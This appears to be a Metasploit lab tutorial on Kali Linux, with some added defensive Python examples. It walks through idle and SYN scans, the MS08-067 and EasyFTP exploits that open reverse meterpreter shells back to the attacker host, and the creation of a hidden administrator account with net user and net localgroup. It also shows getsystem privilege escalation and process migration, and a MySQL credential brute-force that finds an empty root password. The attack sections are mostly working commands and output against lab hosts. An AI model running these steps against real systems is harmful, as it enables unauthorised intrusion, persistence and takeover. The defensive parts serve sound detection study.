How to Get Started with Metasploit (Kali Linux)

root@kali:~# msfconsole

-- Check the version

root@kali:~# msfconsole -v

Framework Version: 4.13.2-dev

Connecting MSF to the PostgreSQL server

root@kali:~# service postgresql start -----> start the PostgreSQL database

root@kali:~# msfdb   (run without arguments, it prints the help below)

Manage a metasploit framework database
msfdb init # initialize the database
msfdb reinit # delete and reinitialize the database
msfdb delete # delete database and stop using it
msfdb start # start the database 
msfdb stop # stop the database

root@kali:~# msfdb init ---> initialize the database

root@kali:~# msfconsole
msf > db_status   --------------> shows the connection state between the PostgreSQL server and msf

[*] PostgreSQL connected to msf
msf >

msf > quit   (quit or exit leaves the console)

Metasploit commands and usage

1) idle scan: IPID scan of an idle target host (choosing the spoofed IP address, i.e. the zombie PC)

[Lab steps]
-> exploit vulnerability -> obtain ID/PASSWORD -> introduce malicious code -> obtain control

1. Scanning

msf > search ipidseq

Matching Modules
================

   Name                          Disclosure Date  Rank    Description
   ----                          ---------------  ----    -----------
   auxiliary/scanner/ip/ipidseq                   normal  IPID Sequence Scanner

msf > use auxiliary/scanner/ip/ipidseq

Some of the options listed by "show options":

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SNAPLEN  65535            no        The number of bytes to capture            // capture size
   THREADS  1                yes       The number of concurrent threads          // thread count (a low value is slow)
   TIMEOUT  500              yes       The reply read timeout in milliseconds    // reply timeout (lowering it is recommended)

Options marked yes under Required must be set; those marked no can be left at their defaults.

msf auxiliary(ipidseq) > set INTERFACE eth1  -----------> use interface eth1
INTERFACE => eth1
msf auxiliary(ipidseq) > set RHOSTS 192.168.20.0/24 ---> scan the hosts in the 192.168.20.0/24 range
RHOSTS => 192.168.20.0/24
msf auxiliary(ipidseq) > set RPORT 80  ---> probe port 80
RPORT => 80
msf auxiliary(ipidseq) > set THREADS 16
THREADS => 16
msf auxiliary(ipidseq) > run

[*] Scanned 105 of 256 hosts (41% complete)
[*] Scanned 128 of 256 hosts (50% complete)
[*] Scanned 155 of 256 hosts (60% complete)
[*] Scanned 180 of 256 hosts (70% complete)
[*] 192.168.20.201's IPID sequence class: Incremental! // (usable as the spoofed source / zombie address)
[*] 192.168.20.200's IPID sequence class: All zeros
[*] 192.168.20.203's IPID sequence class: Incremental! // (usable as the spoofed source / zombie address)
[*] Scanned 207 of 256 hosts (80% complete)
[*] Scanned 236 of 256 hosts (92% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
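What the classes in this output mean, and a small classifier that reproduces the labelling on IP ID sequences, is shown below. This is an added example, not code from the page or from Nmap/Metasploit: the class names follow the module's output, the numeric thresholds are this example's own simplification of Nmap's rules, and the sample values (including the two TEST-NET addresses) are constructed. From the defensive side the point is the inverse of the scan: a host you operate should not come out as Incremental, because a randomised IP ID is what stops it from being usable as a zombie.

```python
"""Classify IP ID sequences the way the ipidseq module labels them.

Added example for this page; it is not Nmap or Metasploit code. The class
names follow the module's output, but the thresholds are this example's
simplification of Nmap's classification, and the sample sequences are
constructed (the IP ID values a host would have returned in its replies).
"""
from typing import Dict, List


def ipid_class(ipids: List[int]) -> str:
    """Return a class label for a host's observed IP ID values.

    "Incremental" means the host's IP ID counter rises by a small step on every
    packet it sends, so the counter reveals how many packets the host emitted
    between two probes; that is the property the idle scan on this page relies
    on. "All zeros", "Constant" and "Randomized" hosts reveal nothing.
    """
    if len(ipids) < 3:
        raise ValueError("need at least three IP ID samples")
    if all(v == 0 for v in ipids):
        return "All zeros"
    # IP ID is a 16-bit field, so consecutive differences wrap modulo 65536.
    diffs = [(b - a) % 65536 for a, b in zip(ipids, ipids[1:])]
    if all(d == 0 for d in diffs):
        return "Constant"
    if all(1 <= d <= 5 for d in diffs):            # threshold: assumption
        return "Incremental"
    # A byte-swapped counter steps by 256 per packet (little-endian host bug).
    if all(d % 256 == 0 and 256 <= d <= 5 * 256 for d in diffs):
        return "Broken little-endian incremental"
    if all(d < 20000 for d in diffs):              # threshold: assumption
        return "Randomized positive increments"
    return "Randomized"


def leaks_packet_count(ipids: List[int]) -> bool:
    """True when the IP ID behaviour exposes the host's packet counter, i.e.
    the behaviour a defender should make sure their own hosts do not show."""
    return ipid_class(ipids) in ("Incremental", "Broken little-endian incremental")


# Constructed samples: six IP ID values seen in replies from each host.
SAMPLES: Dict[str, List[int]] = {
    "192.168.20.201": [4110, 4111, 4112, 4113, 4114, 4115],        # +1 per packet
    "192.168.20.200": [0, 0, 0, 0, 0, 0],
    "192.168.20.203": [65533, 65534, 65535, 0, 1, 2],               # +1, wrapping at 2^16
    "192.0.2.10": [4021, 59874, 12, 31337, 7500, 41000],            # random (TEST-NET address)
    "192.0.2.11": [52992, 53248, 53504, 53760, 54016, 54272],       # +256 per packet
}


def report(samples: Dict[str, List[int]]) -> Dict[str, str]:
    """Label every sampled host, mirroring the module's per-host output line."""
    return {host: ipid_class(seq) for host, seq in samples.items()}


if __name__ == "__main__":
    for host, cls in report(SAMPLES).items():
        flag = "  <- exposes packet counter" if leaks_packet_count(SAMPLES[host]) else ""
        print(f"[*] {host}'s IPID sequence class: {cls}{flag}")
```

The 16-bit wrap matters: the 192.168.20.203 sample crosses 65535 and is still correctly labelled Incremental, which a naive `b - a` comparison would misclassify as random.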

- Scanning Linux200 with '192.168.20.201' as the zombie

-Pn : Treat all hosts as online -- skip host discovery
-sI <zombie host[:probeport]>: Idle scan

msf auxiliary(ipidseq) > db_nmap -Pn -sI 192.168.20.201 192.168.20.200

----> scan of 192.168.20.200 performed through the 192.168.20.201 zombie
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-01 13:44 KST
[*] Nmap: Idle scan using zombie 192.168.20.201 (192.168.20.201:80); Class: Incremental
[*] Nmap: Nmap scan report for 192.168.20.200
[*] Nmap: Host is up (0.053s latency).
[*] Nmap: Not shown: 988 closed|filtered ports
[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 22/tcp open ssh
[*] Nmap: 23/tcp open telnet
[*] Nmap: 25/tcp open smtp
[*] Nmap: 53/tcp open domain
[*] Nmap: 80/tcp open http
[*] Nmap: 110/tcp open pop3
[*] Nmap: 111/tcp open rpcbind
[*] Nmap: 143/tcp open imap
[*] Nmap: 443/tcp open https
[*] Nmap: 993/tcp open imaps
[*] Nmap: 995/tcp open pop3s
[*] Nmap: MAC Address: 00:0C:29:72:28:7C (VMware)
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.37 seconds

To summarize, the commands are run in the order below; "show options" shows what still has to be set.

use auxiliary/scanner/ip/ipidseq
set INTERFACE eth1
set RPORT 80
set THREADS 16

SYN scan: checks the state of the target's ports (unlike nmap, it cannot collect a wide range of information)

search portscan ---> find the path of the matching port-scan module (copy it from the results)

use auxiliary/scanner/portscan/syn
set INTERFACE eth1
set PORTS 1-100
set RHOSTS 192.168.20.200
set THREADS 16
run

[*] TCP OPEN 192.168.20.200:21
[*] TCP OPEN 192.168.20.200:22
[*] TCP OPEN 192.168.20.200:23
[*] TCP OPEN 192.168.20.200:25
[*] TCP OPEN 192.168.20.200:53
[*] TCP OPEN 192.168.20.200:80

SMB scan: scan using Windows NetBIOS

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.20.0/24
set threads 16
run

FTP scan

use auxiliary/scanner/ftp/anonymous
set rhosts 192.168.20.0/24
set threads 256
run

Exploit tools (find a vulnerability -> exploit it)

[Lab steps]
scan -> exploit vulnerability -> obtain ID/PASSWORD -> introduce malicious code -> obtain control

(1) db_nmap scan

-sS : TCP Half Open Scan
-p : Port Number

msf > db_nmap -sS -p 1-500 192.168.20.203

[*] Nmap: PORT STATE SERVICE
[*] Nmap: 21/tcp open ftp
[*] Nmap: 25/tcp open smtp
[*] Nmap: 80/tcp open http
[*] Nmap: 135/tcp open msrpc
[*] Nmap: 139/tcp open netbios-ssn
[*] Nmap: 443/tcp open https
[*] Nmap: 445/tcp open microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:69:FF:FD (VMware)

msf > db_nmap -sS -Pn -A -p 1-500 192.168.20.203

~ output abridged ~

-sS : TCP Half Open Scan  (the scanner resets the half-open connection, hiding the trace of the probed ports)
-Pn : Treat all hosts as online -- skip host discovery (every host is treated as up, so the discovery step is skipped)
-A : Enable OS detection, version detection, script scanning, and traceroute
-p : Port Number

[*] Nmap: OS details: Microsoft Windows XP SP3  ---> information confirmed
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: Host: with-15b28b4cfd; OSs: Windows, Windows 98, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_98, cpe:/o:microsoft:windows_xp
[*] Nmap: Host script results:
[*] Nmap: | ms-sql-info:
[*] Nmap: |   \\192.168.20.203\pipe\sql\query: ---> information confirmed

The 'windows/shell/reverse_tcp' payload module

In msf, the payload is the malicious code that an exploit delivers. For example, after selecting the exploit code with use exploit/windows/smb/ms08_067_netapi, the payload is what is used as the malicious code.

search ms08-067
use exploit/windows/smb/ms08_067_netapi
show options

Payload options (windows/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address
   LPORT     4444             yes       The listen port

show targets

   44  Windows XP SP3 Hungarian (NX)
   45  Windows XP SP3 Italian (NX)
   46  Windows XP SP3 Japanese (NX)
   47  Windows XP SP3 Korean (NX)   ------- select target 47
   48  Windows XP SP3 Dutch (NX)

set LHOST 192.168.20.50
set LPORT 8080
set RHOST 192.168.20.203
set target 47

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 192.168.20.50:8080
[*] Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.20.203
[*] Command shell session 1 opened (192.168.20.50:8080 -> 192.168.20.203:1051) at 2016-06-01 16:15:10 +0900

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration                             --> connected straight to the Windows XP machine, so its information could be read
Ethernet adapter (adapter name unreadable in the source):
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.20.203
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.20.100
C:\WINDOWS\system32> (ctrl+c)
Abort session 1? [y/N] y

msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp ---> select the payload

msf exploit(ms08_067_netapi) > exploit   (with this payload set, the session no longer drops straight into a command prompt as before; the shell command has to be entered to get one)

meterpreter > shell

C:\WINDOWS\system32>
C:\WINDOWS\system32>ipconfig

meterpreter > sysinfo   -> check the system information
Computer : WITH-15B28B4CFD
OS : Windows XP (Build 2600, Service Pack 3).

meterpreter > ps  -> list the processes
Process List
============

 PID  PPID  Name              Arch  Session  User                 Path
 ---  ----  ----              ----  -------  ----                 ----
 0    0     [System Process]
 4    0     System            x86   0        NT AUTHORITY\SYSTEM
 368  4     smss.exe          x86   0        NT AUTHORITY\SYSTEM  \SystemRoot\System32\smss.exe

meterpreter > screenshot  (take a screenshot)
Screenshot saved to: /root/DyxZRLRF.jpeg

Exploiting an FTP vulnerability (EasyFTP 1.7.0.11 running on the Windows XP host)

search easyftp

use exploit/windows/ftp/easyftp_cwd_fixret

show payloads

show targets
   9   Windows Universal - v1.7.0.11

set PAYLOAD windows/meterpreter/reverse_tcp
set target 9
set RHOST 192.168.20.203
set LHOST 192.168.20.50
exploit

Creating a backdoor account and escalating its privileges

meterpreter > shell
Process 1776 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\WINDOWS\system32>net user test test1234 /add     // to remove it: net user test /delete
net user test test1234 /add                          creates an account with this user name and password
C:\WINDOWS\system32>net user
net user
-------------------------------------------------------------------------------
admin                    Administrator            ASPNET
Guest                    HelpAssistant            IUSR_WITH-15B28B4CFD
IWAM_WITH-15B28B4CFD     test
C:\WINDOWS\system32>net localgroup administrators test /add     // the test user is added to the Administrators group
net localgroup administrators test /add
C:\WINDOWS\system32>exit
exit
meterpreter >
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter > getuid
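The net user / net localgroup pair above is exactly what a defender looks for in the Windows Security log: an account creation followed within minutes by membership in the local Administrators group, carried out from the SYSTEM context rather than by a logged-on administrator. The following is an added example, not code from the page or from Metasploit. It assumes the events have already been exported to dicts with the fields shown, uses the current event IDs 4720 (user account created) and 4732 (member added to a security-enabled local group) rather than the older three-digit IDs that Windows XP wrote, and assumes the exporter has resolved the 4732 member SID to a name in MemberName (the raw event often carries only the SID). The records are constructed.

```python
"""Flag backdoor-account creation in Windows Security events.

Added example for this page (not Metasploit code). The records are constructed
dicts shaped like exported Security log entries. Assumptions: current event IDs
(4720 = user account created, 4732 = member added to a security-enabled local
group; Windows XP used different IDs) and a MemberName already resolved from
the member SID by the exporter.
"""
from datetime import datetime, timedelta
from typing import Dict, List

SAMPLE_EVENTS: List[Dict[str, object]] = [
    # a regular administrator creates an account during the day
    {"time": "2016-06-01 09:00:00", "EventID": 4720, "Computer": "WITH-15B28B4CFD",
     "SubjectUserName": "admin", "TargetUserName": "jdoe"},
    {"time": "2016-06-01 09:00:30", "EventID": 4624, "Computer": "WITH-15B28B4CFD",
     "SubjectUserName": "-", "TargetUserName": "jdoe"},
    # the sequence the net user / net localgroup commands above produce when
    # run from a SYSTEM shell: the subject is the machine account (NAME$)
    {"time": "2016-06-01 16:20:01", "EventID": 4720, "Computer": "WITH-15B28B4CFD",
     "SubjectUserName": "WITH-15B28B4CFD$", "TargetUserName": "test"},
    {"time": "2016-06-01 16:20:09", "EventID": 4732, "Computer": "WITH-15B28B4CFD",
     "SubjectUserName": "WITH-15B28B4CFD$", "MemberName": "WITH-15B28B4CFD\\test",
     "TargetUserName": "Administrators"},
]


def _ts(e: Dict[str, object]) -> datetime:
    return datetime.strptime(str(e["time"]), "%Y-%m-%d %H:%M:%S")


def detect_backdoor_accounts(events: List[Dict[str, object]],
                             window: timedelta = timedelta(minutes=10)) -> List[str]:
    """Return alerts for (a) accounts created from the SYSTEM context and
    (b) accounts created and then added to Administrators within `window`."""
    alerts: List[str] = []
    created: Dict[str, datetime] = {}          # account name -> creation time
    for e in sorted(events, key=_ts):
        t = _ts(e)
        if e["EventID"] == 4720:
            acct = str(e["TargetUserName"]).lower()
            created[acct] = t
            subject = str(e["SubjectUserName"])
            if subject.endswith("$"):          # machine account => LocalSystem did it
                alerts.append(f"WARNING {e['Computer']}: account '{acct}' created under the "
                              f"SYSTEM context ({subject}), not by a logged-on administrator")
        elif e["EventID"] == 4732 and str(e["TargetUserName"]).lower() == "administrators":
            acct = str(e["MemberName"]).split("\\")[-1].lower()
            if acct in created and t - created[acct] <= window:
                secs = int((t - created[acct]).total_seconds())
                alerts.append(f"CRITICAL {e['Computer']}: '{acct}' was created and added to "
                              f"Administrators {secs}s later (backdoor account pattern)")
    return alerts


if __name__ == "__main__":
    for alert in detect_backdoor_accounts(SAMPLE_EVENTS):
        print(alert)
```

The two rules are independent on purpose: the machine-account subject catches account creation from any SYSTEM-level shell even when no group change follows, and the create-then-promote correlation fires regardless of who performed it, since a legitimate administrator rarely grants local admin rights seconds after creating a user.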


 

- Rebooting the target system
meterpreter > ps
Process List
============

 PID   PPID  Name              Arch  Session  User                   Path
 ---   ----  ----              ----  -------  ----                   ----
 0     0     [System Process]
 4     0     System            x86   0        NT AUTHORITY\SYSTEM
~ output abridged ~
 1216  1188  explorer.exe      x86   0        WITH-15B28B4CFD\admin  C:\WINDOWS\Explorer.EXE
 1348  800   wuauclt.exe       x86   0        WITH-15B28B4CFD\admin  C:\WINDOWS\system32\wuauclt.exe
~ output abridged ~
meterpreter > migrate 1216   (1216 is the process id; migrate = move the session into that process, so the attacker takes over the process)

meterpreter > reboot

- Delete the msfdb database and create it again.
root@kali:~# msfdb delete
root@kali:~#
root@kali:~# msfdb init

How to use an external scan file

 - The scan has finished and the result was saved as 'scan1.xml' in the '/root' directory (scan -> save the scan)

 - Start msfconsole and check the DB connection and its records

root@kali:~# msfconsole

msf > db_status
[*] postgresql connected to msf

msf > hosts

Hosts
=====

address  mac  name  os_name  os_flavor  os_sp  purpose  info  comments
-------  ---  ----  -------  ---------  -----  -------  ----  --------

 


msf > services

Services
========

host  port  proto  name  state  info
----  ----  -----  ----  -----  ----


-----------> nothing has been recorded in the DB yet.

 - Import the '/root/scan1.xml' scan file into msfconsole.

msf > db_import /root/scan1.xml
[*] Importing 'Nmap XML' data
[*] Import: Parsing with 'Nokogiri v1.6.7'
[*] Importing host 192.168.20.204
[*] Successfully imported /root/scan1.xml

 


msf > hosts

Hosts
=====

address         mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------         ---                ----  -------  ---------  -----  -------  ----  --------
192.168.20.204  00:0c:29:34:5a:8a        Linux               2.6.X  server        

 


msf > services

Services
========

host            port  proto  name         state  info
----            ----  -----  ----         -----  ----
192.168.20.204  21    tcp    ftp          open   vsftpd 2.3.4
192.168.20.204  22    tcp    ssh          open   OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0
192.168.20.204  23    tcp    telnet       open   Linux telnetd
192.168.20.204  25    tcp    smtp         open   Postfix smtpd
192.168.20.204  53    tcp    domain       open   ISC BIND 9.4.2
192.168.20.204  80    tcp    http         open   Apache httpd 2.2.8 (Ubuntu) DAV/2
~ output abridged ~

msf > notes
[*] Time: 2016-06-02 06:37:34 UTC Note: host=192.168.20.204 type=host.imported data={:filename=>"/root/scan1.xml", :type=>"Nmap XML", :time=>2016-06-02 06:37:34 UTC}
[*] Time: 2016-06-02 06:37:36 UTC Note: host=192.168.20.204 type=host.os.nmap_fingerprint data={:os_vendor=>"Linux", :os_family=>"Linux", :os_version=>"2.6.X", :os_accuracy=>100}
[*] Time: 2016-06-02 06:37:36 UTC Note: host=192.168.20.204 type=host.last_boot data={:time=>"Thu Jun  2 14:28:03 2016"}
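db_import reads the Nmap XML and fills the hosts and services tables shown above. To make clear what it extracts, here is an added example (not Metasploit's importer) that parses an Nmap XML document with the standard library and produces the same two tables. The XML below is constructed in Nmap's own schema (nmaprun / host / address / ports / port / service / os) and is not the page's scan1.xml.

```python
"""Build the host and service tables that db_import fills from Nmap XML.

Added example for this page, not Metasploit's importer. SAMPLE_NMAP_XML is a
constructed document in Nmap's XML schema, not the page's scan1.xml.
"""
import xml.etree.ElementTree as ET
from typing import Dict, List

SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap" args="nmap -sV -O -oX scan1.xml 192.0.2.24" start="1464848000">
  <host starttime="1464848001" endtime="1464848020">
    <status state="up" reason="arp-response"/>
    <address addr="192.0.2.24" addrtype="ipv4"/>
    <address addr="00:0C:29:AA:BB:CC" addrtype="mac" vendor="VMware"/>
    <hostnames/>
    <ports>
      <port protocol="tcp" portid="21">
        <state state="open" reason="syn-ack"/>
        <service name="ftp" product="vsftpd" version="2.3.4" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="4.7p1 Debian 8ubuntu1" extrainfo="protocol 2.0" method="probed" conf="10"/>
      </port>
      <port protocol="tcp" portid="23">
        <state state="closed" reason="reset"/>
        <service name="telnet" method="table" conf="3"/>
      </port>
    </ports>
    <os>
      <osmatch name="Linux 2.6.9 - 2.6.33" accuracy="100">
        <osclass type="general purpose" vendor="Linux" osfamily="Linux" osgen="2.6.X" accuracy="100"/>
      </osmatch>
    </os>
  </host>
</nmaprun>
"""


def parse_nmap_xml(xml_text: str) -> Dict[str, List[dict]]:
    """Return {'hosts': [...], 'services': [...]} with the columns the
    msfconsole `hosts` and `services` commands display."""
    root = ET.fromstring(xml_text)
    hosts: List[dict] = []
    services: List[dict] = []
    for host in root.iter("host"):
        status = host.find("status")
        if status is not None and status.get("state") != "up":
            continue                        # hosts reported down carry no data
        addr = mac = None
        for a in host.findall("address"):
            if a.get("addrtype") in ("ipv4", "ipv6"):
                addr = a.get("addr")
            elif a.get("addrtype") == "mac":
                mac = a.get("addr", "").lower()
        if addr is None:
            continue
        osclass = host.find("./os/osmatch/osclass")
        hosts.append({
            "address": addr,
            "mac": mac,
            "os_name": osclass.get("osfamily") if osclass is not None else None,
            "os_version": osclass.get("osgen") if osclass is not None else None,
        })
        for port in host.findall("./ports/port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue                    # only open ports become service rows
            svc = port.find("service")
            info = ""
            if svc is not None:
                info = " ".join(v for v in (svc.get("product"), svc.get("version"),
                                            svc.get("extrainfo")) if v)
            services.append({
                "host": addr,
                "port": int(port.get("portid")),
                "proto": port.get("protocol"),
                "name": svc.get("name") if svc is not None else None,
                "state": "open",
                "info": info,
            })
    return {"hosts": hosts, "services": services}


def print_tables(data: Dict[str, List[dict]]) -> None:
    print("Hosts")
    for h in data["hosts"]:
        print(f"  {h['address']:<16}{(h['mac'] or ''):<19}{(h['os_name'] or ''):<8}{h['os_version'] or ''}")
    print("Services")
    for s in data["services"]:
        print(f"  {s['host']:<16}{s['port']:<6}{s['proto']:<6}{(s['name'] or ''):<8}{s['state']:<6}{s['info']}")


if __name__ == "__main__":
    print_tables(parse_nmap_xml(SAMPLE_NMAP_XML))
```

Only open ports become service rows, and the version string is the concatenation of product, version and extrainfo, which is why the `services` table above shows "OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0" as one info column.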

Scanning the target

search portscan

use auxiliary/scanner/portscan/syn
set INTERFACE eth1
set PORTS 1-500
set RHOSTS 192.168.20.204
set THREADS 50
run

[*] TCP OPEN 192.168.20.204:21
[*] TCP OPEN 192.168.20.204:22
[*] TCP OPEN 192.168.20.204:23
[*] TCP OPEN 192.168.20.204:25
[*] TCP OPEN 192.168.20.204:53
[*] TCP OPEN 192.168.20.204:80
[*] TCP OPEN 192.168.20.204:111
[*] TCP OPEN 192.168.20.204:139
[*] TCP OPEN 192.168.20.204:445
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

db_nmap scan

-sV: Probe open ports to determine service/version info
-O: Enable OS detection
-p <port ranges>: Only scan specified ports
-v: Increase verbosity level (use -vv or more for greater effect)

msf > db_nmap -sV -O -p1-500 -v 192.168.20.204

 

[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)

 

[*] Nmap: OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds
[*] Nmap: Raw packets sent: 538 (26.104KB) | Rcvd: 534 (23.816KB)
msf >
msf > quit

Finding and exploiting a vulnerability (MySQL remote login attempt)

(1) Create the user name / password dictionary files

Kali Linux
- Create simple user name and password dictionary files. (Metasploitable2-Linux has no MySQL root password.)

root@kali:~# cd /usr/share/metasploit-framework/data/wordlists/
root@kali:/usr/share/metasploit-framework/data/wordlists# vi user.txt   (user names)
root
admin
:wq!

root@kali:/usr/share/metasploit-framework/data/wordlists# vi pass.txt   (passwords)
<blank line>
root
admin

(2) Run the db_nmap scan

- Run a db_nmap scan against the target '192.168.20.204'.
-sV: Probe open ports to determine service/version info

root@kali:~# msfconsole
msf > db_nmap -sV 192.168.20.204
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-02 16:29 KST
[*] Nmap: Nmap scan report for 192.168.20.204
[*] Nmap: Host is up (0.00021s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT STATE SERVICE VERSION
[*] Nmap: 21/tcp open ftp vsftpd 2.3.4
[*] Nmap: 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp open telnet Linux telnetd
[*] Nmap: 25/tcp open smtp Postfix smtpd
[*] Nmap: 53/tcp open domain ISC BIND 9.4.2
[*] Nmap: 80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp open rpcbind 2 (RPC #100000)
[*] Nmap: 139/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp open netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp open exec netkit-rsh rexecd
[*] Nmap: 513/tcp open login?
[*] Nmap: 514/tcp open shell Netkit rshd
[*] Nmap: 1099/tcp open rmiregistry GNU Classpath grmiregistry
[*] Nmap: 1524/tcp open shell Metasploitable root shell
[*] Nmap: 2049/tcp open nfs 2-4 (RPC #100003)
[*] Nmap: 2121/tcp open ftp ProFTPD 1.3.1
[*] Nmap: 3306/tcp open mysql MySQL 5.0.51a-3ubuntu5

search mysql_login
   auxiliary/scanner/mysql/mysql_login   normal  MySQL Login Utility

msf > use auxiliary/scanner/mysql/mysql_login
show options
set RHOSTS 192.168.20.204
set USER_FILE /usr/share/metasploit-framework/data/wordlists/user.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/pass.txt
run

msf auxiliary(mysql_login) > run
[*] 192.168.20.204:3306 MYSQL - Found remote MySQL version 5.0.51a
[+] 192.168.20.204:3306 MYSQL - Success: 'root:'

Finding and exploiting a vulnerability (TikiWiki)

 - Find the vulnerability with Metasploit, then exploit the tikiwiki vulnerability

 - tikiwiki: a wiki service that uses a MySQL database (more widely used than other wikis)

 - Reference sites: http://tiki.org, http://tehemes.tiki.org

[Reference] Wiki

A bulletin-board style web service for the internet or for internal company use, on which posts and documents can be worked on collaboratively.

[Lab steps]

create the 'tikiwiki195' DB -> scan -> exploit the tikiwiki vulnerability -> obtain the MySQL ID/PASSWORD -> connect to the tikiwiki MySQL ->
-> access the tikiwiki195 DB and read the ID/PASSWORD -> connect to the web interface and log in as administrator

Ex1) Create the 'tikiwiki195' DB in the Metasploitable2-Linux MySQL

@ Kali Linux

 - To test the vulnerability, create the 'tikiwiki195' database in the MySQL server of Metasploitable2-Linux.

root@kali:~# firefox http://192.168.20.204/tikiwiki/tiki-index.php

Click 'go here to begin the installation process'

Create the 'tikiwiki195' DB with the root account -> click Submit Query

~ steps abridged ~

Click create -> close Firefox

 - Confirm on Metasploitable2-Linux that the 'tikiwiki195' DB was created

@ Metasploitable2-Linux

msfadmin@metasploitable:~$ mysql -u root -p
Enter password: (press Enter)
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 14
Server version: 5.0.51a-3ubuntu5 (Ubuntu)

 

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

 

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| dvwa               |
| metasploit         |
| mysql              |
| owasp10            |
| tikiwiki           |
| tikiwiki195        |
+--------------------+
7 rows in set (0.00 sec)

 

mysql> quit
Bye
msfadmin@metasploitable:~$

Searching for and exploiting the 'tikiwiki' vulnerability

- Run a db_nmap scan against the target '192.168.20.204'.

@ Kali Linux

  -sV: Probe open ports to determine service/version info

root@kali:~# msfconsole

msf > db_nmap -sV 192.168.20.204
[*] Nmap: Starting Nmap 6.49BETA4 ( https://nmap.org ) at 2016-06-02 16:29 KST
[*] Nmap: Nmap scan report for 192.168.20.204
[*] Nmap: Host is up (0.00021s latency).
[*] Nmap: Not shown: 977 closed ports
[*] Nmap: PORT     STATE SERVICE     VERSION
[*] Nmap: 21/tcp   open  ftp         vsftpd 2.3.4
[*] Nmap: 22/tcp   open  ssh         OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
[*] Nmap: 23/tcp   open  telnet      Linux telnetd
[*] Nmap: 25/tcp   open  smtp        Postfix smtpd
[*] Nmap: 53/tcp   open  domain      ISC BIND 9.4.2
[*] Nmap: 80/tcp   open  http        Apache httpd 2.2.8 ((Ubuntu) DAV/2)
[*] Nmap: 111/tcp  open  rpcbind     2 (RPC #100000)
[*] Nmap: 139/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 445/tcp  open  netbios-ssn Samba smbd 3.X (workgroup: WORKGROUP)
[*] Nmap: 512/tcp  open  exec        netkit-rsh rexecd
~ output abridged ~

msf > search tikiwiki

Matching Modules
================

   Name                                             Disclosure Date  Rank       Description
   ----                                             ---------------  ----       -----------
   auxiliary/admin/tikiwiki/tikidblib               2006-11-01       normal     TikiWiki Information Disclosure
   exploit/unix/webapp/php_xmlrpc_eval              2005-06-29       excellent  PHP XML-RPC Arbitrary Code Execution
   exploit/unix/webapp/tikiwiki_graph_formula_exec  2007-10-10       excellent  TikiWiki tiki-graph_formula Remote PHP Code Execution
   exploit/unix/webapp/tikiwiki_jhot_exec           2006-09-02       excellent  TikiWiki jhot Remote Command Execution
   exploit/unix/webapp/tikiwiki_unserialize_exec    2012-07-04       excellent  Tiki Wiki unserialize() PHP Code Execution

 

 

msf > use auxiliary/admin/tikiwiki/tikidblib
msf auxiliary(tikidblib) >
msf auxiliary(tikidblib) > show options

Module options (auxiliary/admin/tikiwiki/tikidblib):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                     yes       The target address
   RPORT    80               yes       The target port
